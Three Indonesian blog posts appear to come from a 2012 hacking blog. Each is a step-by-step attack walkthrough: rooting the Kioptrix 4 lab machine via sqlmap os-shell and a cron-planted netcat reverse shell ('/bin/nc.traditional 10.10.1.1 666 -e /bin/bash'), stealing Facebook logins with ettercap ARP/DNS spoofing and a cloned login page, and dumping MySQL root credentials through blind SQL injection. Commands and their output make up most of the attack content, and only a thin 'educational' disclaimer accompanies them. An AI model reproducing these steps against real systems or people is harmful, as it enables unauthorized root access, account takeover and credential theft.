Kamis, 10 Mei 2012

Special Rooting [via SQLmap]

Root adalah user yang memiliki hak akses tertinggi dalam sistem operasi UNIX. Dalam system operasi Windows, root sama dengan NT AUTHORITY SYSTEM. Privilege escalating pada sistem operasi UNIX cukup mudah. User biasanya menggunakan perintah

Command :
user@unix:~$ suPassword: su: Authentication failureuser@unix:~$

Pada perintah su, user harus memasukan password milik root. Jika berhasil, maka user akan menjadi root dalam sistem tersebut. Kebanyakan mesin komputer yang memiliki OS UNIX, password root TIDAK diberikan secara cuma-cuma kepada user lain. Artinya password root hanya diketahui oleh segelintir orang. Hal ini bertujuan agar sistem tetap aman, tanpa user 'nakal' yang menggunakan hak akses root untuk mengubah system.

Mengangkat hak akses juga bisa dilakukan dengan perintah

Command :
user@unix:~$ iduid=2000(user) gid=2000(user) groups=2000(user)user@unix:~$ sudo suPassword: [sudo] password for www-data:root@unix:~# iduid=0(root) gid=0(root) groups=0(root)

Ini adalah sedikit contoh mengenai escalating privilege pada unix. Namun perusahaan yang cerdas, akan membatasi user untuk mengeksekusi perintah sudo su, agar user 'nakal' tidak menggunakan hak akses root untuk mengubah system.

Apa istimewanya root? Kali ini saya akan menjelaskan sedikit kemampuan khusus yang dimiliki oleh root. Yaitu menghapus data milik user lain.

Command :
www-data@red-dragon:/tmp$ echo "delete me if you can" > fuck_youwww-data@red-dragon:/tmp$ ls -l fuck_you -rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_youwww-data@red-dragon:/tmp$ cat fuck_you delete me if you can

User bernama www-data membuat sebuah file bernama fuck_you, yang berisi "delete me if you can". File ini terletak pada folder /tmp/.

Note : Tulisan yang berwarna kuning adalah hasil output dari perintah.
Kemudian datang user lain bernama couchdb. User ini sepertinya tidak suka dengan isi dan nama file yang dibuat oleh user www-data. Kemudian ia mencoba untuk menghapus file tersebut.

Command :
couchdb@red-dragon:/tmp$ ls -l fuck_you -rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_youcouchdb@red-dragon:/tmp$ rm fuck_yourm: remove write-protected regular file `fuck_you'? YESrm: cannot remove `fuck_you': Operation not permitted

Mengapa bisa seperti ini? Telah kita ketahui sebelumnya bahwa file ini milik user www-data, ketika user couchdb hendak menghapus file ini, maka system berkata:

"File ini milik www-data, kau tidak bisa menghapus file ini..."

Perhatikan ketika root hendak menghapus file ini

Command :
root@red-dragon:/tmp# ls -l fuck_you -rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_youroot@red-dragon:/tmp# rm fuck_youroot@red-dragon:/tmp# ls -l fuck_yourm: cannot remove `fuck_you': No such file or directory

File berhasil dihapus oleh root. Pada kasus web server, penggunaan hak akses ini yang membatasi peretas dalam melakukan mass deface. Karena peretas masuk ke dalam system dengan user A, dan tidak bisa mengganti file index milik user B-Z. Pada tahap seperti ini, peretas harus dapat mengangkat hak aksesnya menjadi root agar peretas dapat melancarkan serangan mass deface pada web server target.

Kali ini saya akan menjelaskan skema peretasan hak akses root hanya dengan menggunakan SQLmap! Saya melanjutkan peretasan pada KIOPTRIX 4, yang berjalan pada VMware saya. Percobaan peretasan KIOPTRIX 4 sudah saya jelaskan pada postingan saya sebelumnya.

Skill Requirements:
  1. MYSQL command line
  2. Spawn Shell With SQLmap

Tools Requirements:
  1. SQLmap (dapat ditemukan pada backtrack 5) 
Attacking Schema:
  1. Attacker mengendalikan shell system milik korban
  2. Mencari informasi mengenai password root database MySQL
  3. Login database dengan akses root, dan membuat evil database
  4. Meremote cron.d milik korban
  5. GAME OVER
EULA
Tutorial ini di tulis dengan tujuan edukasi, penyalahgunaan skill yang terdapat dalam tutorial ini adalah tanggung jawab pembaca.

Walktrough
1. Spawn Bash With SQLmap

Untuk mengendalikan shell system milik korban, kita dapat menggunakan SQLmap. Pada tutorial sebelumnya, saya telah menjelaskan cara melakukan spawn bash dengan SQLmap.

Command :
<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie --os-shell

Setelah bash telah tereksekusi, kita akan menggunakan backdoor sederhana ini untuk melakukan rooting. Kali ini saya akan melakukan rooting melalui MYSQL yang berjalan pada system korban. Namun untuk mengakses database, saya harus dapat log in ke dalam database, dengan username dan password yang telah terdaftar pada database system. Pada posting sebelumnya mengenai Tricky Log In to MYSQL, kita telah mengetahui, bahwa root password bernilai blank. Artinya, kita dapat log in ke database dengan username root TANPA password.

Command :
os-shell>  mysql -uroot -e "show databases;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---Databaseinformation_schemamembersmysql---



Parameter -e akan mengeksekusi perintah SQL. Gunakan tanda petik dua untuk mengapit command MySQL, dan akhiri command mysql dengan titik koma. Setelah ini, kita buat database baru dengan nama exploit.

Command :
os-shell> mysql -uroot -e "create database exploit;"do you want to retrieve the command standard output? [Y/n/a] No outputos-shell> mysql -uroot -e "show databases;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---Databaseinformation_schemaexploitmembersmysql---

Database exploit, telah berhasil dibuat. Selanjutnya kita buat tabel bernama rootme, dan kolom bernama stack dengan atribut text.

Note : Jika command mysql berhasil di eksekusi, maka tidak ada output yang tercipta (No Output).

Command :
os-shell> mysql -uroot -e "use exploit; create table rootme (stack text);"do you want to retrieve the command standard output? [Y/n/a] No outputos-shell> mysql -uroot -e "use exploit; show tables;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---Tables_in_exploitrootme---


Selanjutnya kita input table ini dengan perintah cron.d. Ketahuilah rooting sebelumnya dengan burpsuite, dimana attacker menaruh perintah cron.d agar root mengeksekusi file tersebut, sehingga attacker mendapatkan shell dengan privilege root. Artikel dapat ditemukan di SQL Injection Level 4 Final [rooting]. Tabel ini kita masukan perintah cron.d seperti ini

Command :
* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash

Dimana 10.10.1.1 adalah IP saya (sesuaikan dengan IP address anda), dan 666 adalah port listener netcat saya. Kita input perintah ini ke dalam table rootme.

Command :
os-shell> mysql -uroot -e "use exploit; insert into rootme value ('* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash \r\n');"do you want to retrieve the command standard output? [Y/n/a] No outputos-shell> mysql -uroot -e "use exploit; select * from rootme;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---stack* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash 
---


Kita jalankan netcat listener pada port 666 dari attacker.

Command :
<< back|track 5 R2 [~] nc -l -v -p 666


Setelah menunggu 2 menit, file cron.d tereksekusi, dan kita akan mendapatkan koneksi netcat dari korban dengan privilege root.

Command :
<< back|track 5 R2 [~] nc -l -v -p 666listening on [any] 666 ...10.10.1.128: inverse host lookup failed: Unknown hostconnect to [10.10.1.1] from (UNKNOWN) [10.10.1.128] 49490iduid=0(root) gid=0(root) groups=0(root)


You are so....

pwned by : red-dragon

Rabu, 09 Mei 2012

FMITM Hacking Account [Facebook]

Ada banyak sekali cara melakukan peretasan akun facebook. Cara yang sedang populer adalah menggunakan social engineering attack. Penggunaan social engineering sendiri, mengandalkan kecerobohan korban, agar korban masuk ke dalam jebakan peretas. Cara ini yang paling ampuh, karena tidak ada patch untuk kebodohan manusia. Kali ini saya tidak memberikan tutorial social engineering attack, karena saya tidak expert dalam masalah social engineering, melainkan dengan menggunakan metode saya sendiri. Saya menyebutnya dengan Fisher Man In The Middle.

Concept:

Konsepnya adalah menggabungkan MITM attack dengan fake login attack. Saya mengkloning halaman login facebook, kemudian memodifikasi script login dan menempatkannya pada localhost. Mengapa localhost? IP local lebih cocok dalam melakukan spoofing attack pada metode MITM. Selain itu, membuat domain lebih sulit dan repot ketimbang menggunakan mesin sendiri sebagai server. Setelah membuat halaman login, saya menjalankan metode MITM dengan ettercap, dan melakukan spoofing attack. Sehingga semua user dalam localhost, akan di-redirect menuju IP address saya, dimana IP address saya menuju ke port 80 dan fake login saya sudah siap melakukan tugasnya.

Kelebihan:
  1. FMITM tidak membutuhkan file dan web hosting
  2. Dalam prakteknya FMITM dapat menjaring lebih dari 3 user account dalam waktu kurang dari 10 menit.
  3. Cara ini nyaris tidak dapat dihindari, karena metode MITM yang dipakai.

MITM [DNS Spoofing]

Victim -> Packet [Bring me to google] -> Access Point
Victim <- Packet [Google] <- Access Point

Diatas, menunjukan sesaat sebelum terjadinya spoofing attack yang dilakukan oleh attacker. Dimana korban mengirim paket berisi "bawa saya menuju google", paket ini dikirim kepada access point. Kemudian access point mendapat packet dari korban, sebagai respon, access point akan menghubungkan korban kepada google.

Victim -> Packet [Bring me to google] -> FMITM aka attacker [Modifying Packet] ->  Packet [Bring me to IP attacker] -> Access Point
Victim <- Packet [IP attacker] <- FMITM aka attacker [Forwarding Packet] <- Packet [IP attacker] Access Point

Sementara alur diatas menjelaskan FMITM attack.
  1. Korban mengirim paket kepada access point (AP), paket berisi "Tolong bawa saya ke google"
  2. Attacker mengambil paket, dan memodifikasinya (inject packet with poison). Paket diubah menjadi "Bawa saya ke IP attacker".
  3. Paket yang telah dimodifikasi oleh Attacker dikirim ke AP.
  4. AP menerima paket, sebagai respon AP mengirim pake balasan dengan isi "IP attacker"
  5. Packet tersebut kembali di-intercept oleh attacker, kali ini attacker tidak memodifikasi paket. Melainkan hanya meneruskan packet tersebut kepada korban.
  6. Korban menerima paket, dan menuju ke IP attacker
Attacker telah menjalankan service HTTPD, sehingga ketika korban menuju IP address attacker, korban akan melihat halaman index milik attacker. Halaman index attacker telah diubah oleh attacker, sehingga halaman ini dapat melakukan aksi pishing.

Mengapa MITM?
Aksi MITM dapat membuat korban menuju fake login page, KEMANAPUN korban mencoba pergi. Dan metode ini tidak mengubah URL korban, sehingga tidak menimbulkan kecurigaan.

Mengapa Fake Login?
Fake login adalah paduan yang cocok dengan metode MITM, mengingat SET milik dave_rel1k masih menerima service cookie. Sehingga terjadi kecacatan dalam output hasil pancingan.

Preparation :
  1. ettercap (dapat ditemukan pada backtrack)
  2. apache (dapat ditemukan pada backtrack)
  3. Fake login script (dapat di download di sini)
Note : password archive adalah "red-dragon" (tanpa tanda kutip)

EULA (End User License Agreement)
Tutorial ini ditulis dengan tujuan edukasi, panyalah gunaan skill yang terdapat dalam tutorial ini, adalah tanggung jawab pembaca.

Walktrough
1. Setting Up Ettercap

Ketahuilah IP address anda, ini hal paling dasar dalam melakukan FMITM. Anda juga harus memperhatikan lewat mana anda menyerang. MITM hanya berlaku pada localhost, jika anda menggunakan modem, anda tidak bisa melakukan hal ini lebih jauh. Jika anda menggunakan kabel LAN, maka anda menggunakan interface eth0. Jika anda menggunakan jaringan nirkabel (wifi), maka anda menggunakan interface wlan0. Untuk mengecek IP address, anda dapat menggunakan perintah:

Command :
<< back|track 5 R2 [~] ifconfig vmnet8 | grep "inet addr:" | awk -F ":" '{print $2}' | sed s/"  Bcast"//g


Kali ini saya menggunakan Virtual OS untuk menguji keberhasilan metode saya. Hal ini bertujuan agar tidak ada pihak yang dirugikan selama pembuatan tutorial ini. Virtual OS saya menggunakan network adapter NAT, dimana Virtual OS saya dapat menggunakan internet JIKA backtrack saya memiliki akses internet. Saya menggunakan Windows XP Service Pack 2, berbahasa Inggris selama pengujian metode ini.

IP address saya adalah 10.10.2.1. Selanjutnya saya akan menaruh IP address ini pada config file dns spoof milik ettercap. Untuk dapat meng-input IP address ini, gunakan perintah

Command :
<< back|track 5 R2 [~] nano /usr/local/share/ettercap/etter.dns

Kemudian arahkan pointer keyboard pada akhir halaman, dan tambahkan:

Input :
* A [IP Address Anda]


Pengaturan seperti ini akan membuat korban dialihkan ke 10.10.2.1 KEMANAPUN korban pergi. Jika anda hanya ingin mengalihkan korban yang menuju youtube, maka.

Input :
*.youtube.com/* A [IP Address Anda]

Gunakan kemampuan bernalar anda sendiri dalam melakukan pengaturan file ettercap. Setelah selesai, tekan tombol ctrl+x kemudian tekan y, dan enter. File pengaturan anda berhasil tersimpan!


2. Mengatur fake login

Setelah mengunduh file dari link yang tersedia dalam persiapan di atas, copy semua file ke folder /var/www. Perlu diperhatikan. Anda harus mengubah ownership file ini menjadi milik www-data agar pishing dapat bekerja sebagaimana mestinya. Untuk mengecek ownership file, gunakan perintah

Command :
<< back|track 5 R2 [~] cd /var/www

Command :
<< back|track 5 R2 [/var/www] ls -l


Perhatikan, semua file ini milik root! Anda harus mengubah ownership file ini menjadi milik www-data dengan perintah

Command :
<< back|track 5 R2 [/var/www] chown www-data:www-data *

Kemudian cek kembali ownership file dengan perintah

Command :
<< back|track 5 R2 [/var/www] ls -l


Setelah file-file ini menjadi milik www-data. Maka selanjutnya kita akan menjalankan service apache, untuk menjalankan service apache, gunakan perintah:


Command :
<< back|track 5 R2 [/var/www] apache2ctl start


atau


Command :
<< back|track 5 R2 [/var/www] service apache2 start


atau


Command :
<< back|track 5 R2 [/var/www] /etc/ini.d/apache2 start


dan semua persiapanpun telah selesai.


3. FMITM in action

Sebelum memulai FMITM, saya akan membuktikan keberhasilan MITM dalam melakukan redirect ke IP address saya. Ini adalah screenshoot sebelum FMITM dilakukan:


Perhatikan command prompt. Perintah ping www.google.com menunjukan adanya balasan dari google, IP address ini milik google, dan ini wajar pada jaringan yang belum terserang MITM attack.

Kemudian saya jalankan perintah MITM dengan menggunakan etercap.

Command :
<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE // // -P dns_spoof

Perhatikan kembali IP address anda, dan sesuaikan dengan perintah ettercap anda. Tanda // adalah target anda. // pertama menunjukan target 1, dan // kedua menunjukan target 2. Jika anda isi kosong, maka ettercap akan melancarkan serangan kepada semua IP address pada localhost, termasuk anda sendiri! Bagaimana jika anda hanya mengicar 1 orang?

Contoh:
Target 1 = 192.168.1.1 [Target 1 HARUS IP gate away]
Target 2 = 192.168.1.2

Maka perintah ettercap

Command :
<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE /192.168.1.1/ /192.168.1.2/ -P dns_spoof

Bagaimana jika target 2 berjumlah lebih dari 1?

Contoh:
Target 1 = 192.168.1.1 [Target 1 HARUS IP gate away]
Target 2 = 192.168.1.2 dan 192.168.1.3

Command :
<< back|track 5 R2 [/var/www] ettercap -T -q -i vmnet8 -M ARP:REMOTE /192.168.1.1/ /192.168.1.2,3/ -P dns_spoof

Dan ini adalah screenshoot ketika MITM terjadi


Perhatikan kembali command prompt. Pada perintah ping www.google.com yang ke dua, IP balasan bukanlah seperti IP address pada perintah ping pertama sebelum terjadinya MITM. IP balasan justru 10.10.2.1, dimana IP tersebut, adalah IP milik saya. Perhatikan juga URL pada Mozilla. URL menunjukan www.google.com, namun halaman berubah menjadi index localhost milik attacker. Monitoring selalu file hasil.txt dengan perintah

Command :
<< back|track 5 R2 [~] tail -f /var/www/hasil.txt

Jika ada korban yang masuk, maka....



You are so.....

Pwned by : red-dragon

Senin, 07 Mei 2012

Tricky Log In to MySQL

Ada banyak cara untuk melakukan Log In MySQL. Kebanyakan dilakukan dengan Web Shell yang memiliki fitur koneksi ke database MySQL sebuah web server. Setidaknya anda melakukan beberapa tahapan sebelum anda sampai ke database server.
  1. SQL Injection (Need Tools)
  2. Log in site (Need Browser)
  3. Upload Shell (Need Shell)
  4. Find config.php or etc
  5. Log In
Namun saya hanya membutuhkan SQLmap dan netcat untuk menembak database server. Satu hal yang terpenting, anda harus menggunakan kecerdasan anda sendiri ketika menghadapi sebuah masalah dalam melakukan penetrasi test. Anda tidak bisa mengandalkan satu teori untuk menyelesaikan banyak masalah. Dalam hal ini, saya menemukan banyak kesulitan.
  1. Port MySQL difilter, sehingga saya tidak bisa langsung mengkoneksikan mesin saya ke database server dengan IP address saya (mungkin pengaturan iptables yang membatasi saya)
  2. Tidak ada config.php pada document root, sehingga saya harus melakukan blind SQLi untuk memperoleh root password mysql.
  3. Tidak ada fitur upload pada situs ini, sehingga saya tidak dapat melakukan upload shell untuk melakukan koneksi mysql.


Sadarilah, tidak ada yang mudah. Dan percayailah, bahwa yang sulit akan membawa anda pada teori baru yang membuat anda semakin berkualitas. ;)

Dalam turorial kali ini, saya masih menggunakan Virtual OS yang berjalan pada VMware dengan IP address 10.10.1.128. Tutorial ini masih berkaitan dengan Spawn Shell With SQLmap dan Back Connect With SQLmap. Jika anda belum membaca kedua tutorial di atas, alangkah baiknya jika anda memahami kedua konsep diatas sebelum anda melakukan tahap ini.

MySQL Connection

Attacker (IP attacker) -> (Username + Password) -> MySQL port (3306)

Jika autentikasi valid, maka attacker dapat mengakses database web server. Autentikasi sendiri dapat dibatasi dengan pengaturan dari MySQL sendiri, atau melakukan filtrasi dari IP luar untuk memblokir paket yang masuk ke port 3306. Dan logikanya, TIDAK ADA web server yang menolak koneksi localhost untuk melakukan log in ke dalam database. Ini mengapa kebanyakan peretas menggunakan webshell untuk mengkoneksikan mesinnya ke dalam database web server.

Attacker -> Web Shell (IP Local) -> (Username + Password) -> MySQL port (3306)

Pada kasus diatas, kemungkinan keberhasilan log in sangat tinggi, terlebih karena attacker menggunakan IP local milik web server, sehingga MySQL akan membaca paket login dengan IP 127.0.0.1. Paket ini tidak akan ditolak, karena berasal dari localhost. Dan permasalahannya adalah, mampukan attacker mendapatkan username + passwor? Tantangan yang sesungguhnya bukanlah mencari config.php, karena config.php hanya menyimpan username + password dari virtual user saja. Tantangan sesungguhnya justru datang dari, mampukah attacker mendapatkan root password MySQL?

EULA (End User License Agreement)
Tutorial ini ditulis dengan tujuan edukasi, penyalahgunaan skill yang berasal dari tutorial ini, adalah tanggung jawab penulis.

Preparation :
  1. SQLmap (dapat ditemukan di backtrack)
  2. netcat (dapat ditemukan di backtrack)
Walkthrough :
1. Dumping username + password root MySQL

Untuk melakukan hal ini, saya menggunakan SQLmap 1.0 versi developer pada revisi 5029. Kita tau bahwa mesin 10.10.1.128 memiliki kelemahan terhadap penyerangan SQL Inection pada halaman checklogin.php pada parameter mypassword (baca tutorial SQL Injection Level 4 Part 1). Setelah melalui tahap pengujian, ternyata kita mendapatkan database MySQL 5. Dan situs ini lemah terhadap penyerangan SQL Injection type boolean-based blind, dan AND/OR time-based blind. Karena ber-type blind, maka ini akan terasa seperti menunggu hujan emas. SQLmap akan berusaha mencari string yang tepat pada percobaan satu per satu dalam menemukan informasi yang diinginkan. Ini seperti meraba-raba kertas putih, menebaknya, kemudian jika tebakan anda benar maka karakter tebakan anda kan muncul. SQLmap akan menebak karakter per karakter. Ini adalah ciri khas dari SQL Injection type blind.

Command :
<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie --dbs

Perintah di atas bertujuan untuk melakukan ekstraksi daftar database yang ada pada web server. Dan hasilnya.


Sebagai informasi, username dan password root mysql selalu terletak pada database mysql. Maka kita harus menggunakan database ini untuk mencari table dan column yang tepat, dimana username dan passwor root mysql tersimpan.

Command :
<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie -D mysql --table


Kita berhasil mendapatkan table user di dalam database mysql. Selanjutnya kita akan menggunakan table ini untuk melakukan ekstraksi daftar kolom yang terdapat di dalam table user.

Command :
<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie -D mysql -T user --column


Kita berhasil mendapatkan kolom User dan Password. Langkah selanjutnya adalah mengekstraksi ke dua kolom ini, sehingga kita dapat memperoleh data di yang tersimpan di dalam ke dua kolom ini.

Command :
<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie -D mysql -T user --C User,Passwod --dump


Ternyata password mysql tidak diatur oleh web admin. Dalam beberapa kasus, mungkin anda akan menemukan password telah diatur, sehingga anda menemukan password yang terenkripsi. Anda harus melakukan decode hash ini sehingga anda mendapatkan clear text dari hash ini. Untuk melakukan decode hash, anda bisa menggunakan JTR (John The Ripper), atau findmyhash.py yang bisa anda temukan pada backtrack. Anda juga bisa melakukan decode hash dengan bantuan online pada situs-situs yang menyediakan jasa decode hash.


2. Log In database

Anda bisa langsung melakukan log in ke dalam database dari terminal, jadi anda tidak perlu menggunakan web shell untuk melakukan hal ini. Basic command dari koneksi mysql adalah

Command :
<< back|track 5 R2 [~] mysql -u (username) -h (host) -p (password)

Contoh dalam kasus saya

Command :
<< back|track 5 R2 [~] mysql -u root -h 10.10.1.128


Ada yang aneh. Saya tidak dapat log in ke dalam database. Mungkin ini menjadi alasan mengapa web admin tidak mengatur password root mysql, karena dia telah membatasi IP luar untuk melakukan log in ke dalam database web server. Karena IP saya dibatasi, maka saya akan menggunakan IP web server untuk melakukan koneksi ke dalam database. Bukan melalui proxy, namun melalui OS shell. Saya akan mengendalikan OS shell milik web server, sehingga saya akan dikenali sebagai user local oleh web server. Untuk mengendalikan OS shell, saya menggunakan bantuan netcat. Untuk melakukan hal ini, anda harus membaca turotial Back Connect With SQLmap.


Dari sini, saya akan melakukan log in ke dalam database web server.

Command :
www-data@Kioptrix4:/var/www$ mysql -u rootWelcome to the MySQL monitor.  Commands end with ; or \g.Your MySQL connection id is 7243Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;show databases;+--------------------+| Database           |+--------------------+| information_schema | | members            | | mysql              | +--------------------+3 rows in set (0.00 sec)


Karena pasword root blank, maka saya tidak menambahkan parameter -p (untuk mengatur password saat melakukan log in).


Cheers. No hard feeling.

created by : red-dragon